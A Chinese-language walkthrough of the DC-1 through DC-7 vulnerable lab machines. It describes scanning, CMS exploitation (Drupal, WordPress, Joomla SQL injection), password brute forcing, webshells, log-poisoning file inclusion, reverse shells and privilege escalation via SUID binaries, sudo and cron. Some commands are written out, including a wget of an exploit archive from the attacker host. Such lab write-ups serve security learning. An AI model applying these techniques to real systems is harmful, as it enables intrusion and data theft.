nmap开路获取信息
(资料图片仅供参考)
http://192.168.106.133 //Drupal CMS
信息收集:
http://192.168.106.133/robots.txthttp://192.168.106.133/MAINTAINERS.txt //可以获取版本信息
然后用metasploit里面的模块进行攻击。
获取数据库连接信息:
从meterpreter进入shell,执行python -c 'import pty; pty.spawn("/bin/bash")'实现完整交互式shell
进入数据库查找admin密码:select * from users limit 1,1
密码是被加密的。
尝试用新密码特换掉旧的密码。
生成新密码
利用新的管理员密码登录drupal后台
发现flag3:
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
cat /etc/passwd ,发现存在flag4用户。
查看/home/flag4/flag4.txt文件
提示要在root下找flag。看来要提权啊啊啊啊啊
首先想到的是suid提权,找一找suid程序把/
发现/usr/bin/find具有suid权限。那么直接用它执行命令吧。
取得了最终的flag
老规矩,nmap开路
nmap -T4 192.168.106.0/24发现目标主机:192.168.106.134
进行更加详细的扫描:
sudo nmap -sS -sV -p- -A 192.168.106.134 对方开了80端口 apache2.4.107744 ssh OpenSSH 6.7p1
根据靶机说明,绑定一下域名
访问目标网站发现flag1:
http://dc-2/index.php/flag/FlagFlag 1:Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.More passwords is always better, but sometimes you just can’t win them all.Log in as one to see the next flag.If you can’t find it, log in as another.
提示我们需要爆破用户名和密码,并建议试用cewl生成字典
底部还有一个关键信息:Proudly powered by WordPress
所以目标站点是wordpress构建的。
我们尝试用 wpscan 枚举目标的用户名
wpscan --url http://dc-2/ -e u
找到三个用户。分别是admin/jerry/tom
用cewl生成密码
cewl http://dc-2/ -w pass.txt
用wpscan爆破账号和密码:
wpscan -U users.txt -P pass.txt --url http://dc-2/
找到两个账号的密码:
Username: jerry, Password: adipiscing | Username: tom, Password: parturient
登录后台,找到第二个flag:
Flag 2:If you can't exploit WordPress and take a shortcut, there is another way.Hope you found another entry point.
淦,提示用其他方式。
根据前面的收集的信息,还有一个ssh端口。
尝试登陆试试。
发现 jerry的密码登录不了,。试试tom
可以用tom的密码登录,。
tom@DC-2:~$ cat flag3.txt-rbash: cat: command not found提示是一个rbash。命令受限。
查看flag3.txt的内容:
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
提示要切换到jerry用户,不过现在是rbash,要先绕过rbash才行。然后查看flag4.txt
使用sudo -l查看哪些可以执行sudo的命令。
发现git命令可以且不需要密码,可以利用它提权
#
成功获取到了root权限和获取了最终的flag。
老规矩,nmap开路
扫描目标:
信息:开放了 80端口
web容器:Apache 2.4.18
目标系统:Ubuntu
访问80端口看看
发现是Joomla网站。使用Joomscan扫描试试
如果没有,安装一下 sudo apt install joomscan
扫描到了版本信息和一些目录和后台管理地址
在exploitdb中尝试查找一下Joomla 3.7.0的漏洞
找到一个漏洞信息,是一个sql注入,并且给出了poc,直接上sqlmap
获取了数据库,接着获取表:
看看#_users表里面信息。
密码是加密的。尝试破解一下。就用自带的 John破解工具试试
john pass.txt破解出来密码是:snoopy
登录后台试试。成功登录了
在Template里面写一个shell
用msf生成一个php webshell,然后写入,访问,获取会话
获取到的权限是 www-data用户
查看系统信息:
搜一下系统版本相关的漏洞
找到一个和目标系统符合的漏洞信息:
是一个eBPF 本地提权漏洞下载利用脚本到目标机www-data@DC-3:/tmp$ wget http://192.168.106.132:8080/39772.zip
解压然后利用提权
提权成功。
成功获取到了flag。
DC3总结:利用Joomla 3.7 SQL注入漏洞,dump后台登录用户和密码,在template中写入webshell。连接webshell获取系统shell,利用Ubuntu 16.04 本地提权漏洞获取Root权限,获取最终的flag。
nmap开路
初步确定,目标开了22端口和80端口。
访问80端口页面,发现一个登录页面。
尝试直接爆破试试。
爆破密码为 happy
登录看看
发现一个命令执行工具。
反弹一个shell试试吧。
反弹成功。查看权限发现是www权限
发现jim用户目录有一个密码备份文件。
尝试爆破一下jim的密码:
登录一下
登录后提示有一封邮件,查看邮件内容。
邮件告诉了我们charles用户的密码。
登录charles用户试试,。可以登录
但没啥用,没啥东西。尝试提权。
查找suid程序无果。
查看sudo 程序
发现/usr/bin/teehee有sudo权限,无需密码
利用它写入root权限用户。
成功获取了flag。
老规矩,nmap开路
发现目标开放了80端口和111端口,其他没有什么有用的端口,访问80端口看看
留言页面跳转后有一个 thankyou.php的页面
刷新,发现页脚的文字发生了变化。怀疑thankyou.php存在文件包含。,
先用dirb扫一下目录文件看看
发现存在footer.php文件,thankyou.php页面底部的文字变化可能是包含了footer.php文件
访问一下footer.php文件看看,看到刷新会变化,证实了我们的猜想
fuzz一下变量名:
参数是file
尝试文件包含 http://192.168.106.137/thankyou.php?file=/etc/passwd
发现可以成功。
结合前面的信息 nginx/1.6.2 ,可以尝试包含nginx日志文件获取webshell
nginx的log在/var/log/nginx/access.log和/var/log/nginx/error.log
包含 access.log HTTP/1.1 500 Internal Server Error
包含access.log写入webshell,。连接。
获得www用户权限。
尝试提权。
查找具有suid权限的可执行文件
发现一个 /bin/screen-4.5.0 。
搜一搜漏洞信息
利用本地提权。上传利用脚本,然后执行提权。
nmap扫描
基本信息:开放了22端口,80端口,
根据靶机描述,绑定一下域名-ip
NOTE: You WILL need to edit your hosts file on your pentesting device so that it reads something like:
192.168.106.138 wordy
访问80端口看看 http://wordy/
发现目标是一个 wordpress站点,
尝试用wpscan扫描看看。
wpscan --url http://wordy/
扫描结果显示,没什么有用的信息。
尝试爆破一下登录信息
wpscan -e u --url http://wordy/找到一些用户:admingrahammarksarahjenswpscan --url http://wordy/ -U puser.txt -P /usr/share/wordlists/rockyou.txt //爆破密码有个提示:cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt //简化爆破字典wpscan --url http://wordy/ -U puser.txt -P passwords.txt找到一个密码:mark / helpdesk01
用爆破的密码登录目标网站后台:
看到有个 Activity Monitor插件,众所周知,wordpress的插件很容易有漏洞。
去搜一搜漏洞信息。找到一个命令执行
尝试利用反弹shell。
反弹成功。
拿到的权限是www用户权限
目标信息收集
在 jens用户下发现一个 backups.sh脚本
在 mark用户目录下发现一个文本文件,里面有 graham用户的密码。提示需要切换到 Jens用户。
用graham登录一下目标
尝试收集一下 sudo 程序和suid程序信息
suid没有什么可利用的。但是 /home/jens/backups.sh 可以以jens用户执行,且不需要密码。
利用这个脚本,尝试获取 jens用户的shell。
发现nmap可以以root用户运行而不需要密码
可以用nmap提权。
成功获取了root权限。
成功获取了flag。
老规矩,nmap开路
开放了80端口,22端口。
访问网站看看
目标站点是一个 drupal 站点
有一个版权信息:@DC7USER
找到一个 github仓库:https://github.com/Dc7User/staffdb
找到一个用户名和密码。尝试登陆一下目标网站
发现没办法登录,试试ssh
登录成功了。
收集一下信息。任务计划,sudo、suid啥的
发现一个 /usr/sbin/exim4可能有用,因为它有出过提权漏洞。
exploitdb搜一下,发现这个版本没有提权漏洞。
目录下一个 backups目录和一个 mbox文件。
看看mbox文件是什么东西。
发现一个root用户的任务计划,每隔一段时间,会执行一个脚本
查看文件权限发现 www-data 用户组用户可以对它进行修改。
查看一下脚本内容:
这应该就是一个定时备份网站的脚本。
这里发现一个特别的命令drush
搜一下是干嘛的,
是dupal提供的一个网站管理的命令。
经过查询,发现 drush命令可以更改dupal后台的用户密码。
尝试一下。
登录后台试试。
成功登录。
然后利用php模块 植入webshell
获取到了www用户权限。
修改 /opt/scripts/backups.sh 文件,反弹shell
等待计划任务执行。这一步可能需要最多等15分钟
成功获得了root用户shell
成功获取了flag。
标签:
相关新闻
